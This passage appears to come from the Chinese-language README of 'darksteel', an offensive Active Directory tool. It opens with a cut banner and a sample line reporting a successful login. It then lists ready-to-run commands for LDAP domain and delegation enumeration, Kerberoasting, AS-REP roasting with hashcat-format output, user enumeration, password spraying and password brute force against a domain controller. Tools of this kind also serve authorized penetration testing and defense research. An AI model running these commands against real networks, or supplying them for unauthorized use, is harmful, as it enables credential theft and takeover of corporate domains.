  6. \ \ \_\ \ \ \/\ \ \ \\ \\ \ \\`\ /\ \L\ \ \ \ \ \ \ \L\ \ \ \L\ \ \ \L\ \
  7. \ \____/\ \_\ \_\ \_\ \_\ \_\ \_\\ `\____\ \ \_\ \ \____/\ \____/\ \____/
  8. \/___/ \/_/\/_/\/_/\/ /\/_/\/_/ \/_____/ \/_/ \/___/ \/___/ \/___/
  9. v1.0.8
  10. [+] SUCCESS: zz@test.com:123456
  11. Done! Tested logins in 0.010 seconds

其他用法

ldap

支持密码为hash
  1. darksteel ldap -d 192.168.1.1 -n test.com -u administrator -p hash
查询域内单条内容 -m指定
  1. darksteel ldap -d 192.168.1.1 -n test.com -u administrator -p 123456 -m computer
查询所有委派信息 -w指定
  1. darksteel ldap -d 192.168.1.1 -n test.com -u administrator -p 123456 -w all

可选择参数

  1. -o 保存文件(不包括自定义查询)
  2. -l 最大查询数(默认所有)
  3. -m 指定单独查询内容
  4. -w 指定单独查询委派内容

kerberos

kerberoasting(支持密码为hash)
利用所有用户并输出
  1. darksteel kerberos -d 192.168.1.1 -n test.com -u administrator -p 123 -m kerberoast
利用指定test用户并输出
  1. darksteel kerberos -d 192.168.1.1 -n test.com -u administrator -p 123 -m kerberoast -t test
使用TGT进行认证(只可利用单用户)
  1. darksteel kerberos -d 192.168.1.1 -k 123.kirbi -m kerberoast -t test
asreproast(支持密码为hash)
利用所有用户并输出
  1. darksteel kerberos -d 192.168.1.1 -n test.com -u administrator -p 123 -m asreproast
利用指定test用户并输出
  1. darksteel kerberos -d 192.168.1.1 -n test.com -m asreproast -t test

可选择参数

  1. -o 保存文件(不包括自定义查询)
  2. -l 最大查询数(默认所有)
  3. -e 选择加密方式(默认rc4
  4. -f 选择输出爆破格式(默认hashcat

blast

域用户枚举
  1. darksteel blast -m userenum -d 192.168.1.1 -n test.com -U user.txt
密码喷洒
  1. darksteel blast -m passspray -d 192.168.1.1 -n test.com -U user.txt -p 123456
单用户密码爆破
  1. darksteel blast -m blastpass -d 192.168.1.1 -n test.com -u admin -P password.txt
用户对应密码爆破(字典格式 admin:123456)
  1. darksteel blast -m userpass -d 192.168.1.1 -n test.com -F userpassword.txt

可选择参数

  1. -v 输出失败信息
  2. -t 线程设置(默认20
  3. -o 输出文件
  4. blast时如果在域内使用则可以不指定dc。目前ldap查询不支持

TODO

  1. 1、持续添加其他利用方式
  2. 2、添加其他信息搜集内容
  3. 3、修改BUG

Thank

https://github.com/jcmturner/gokrb5

https://github.com/go-ldap/ldap

https://github.com/ropnop/kerbrute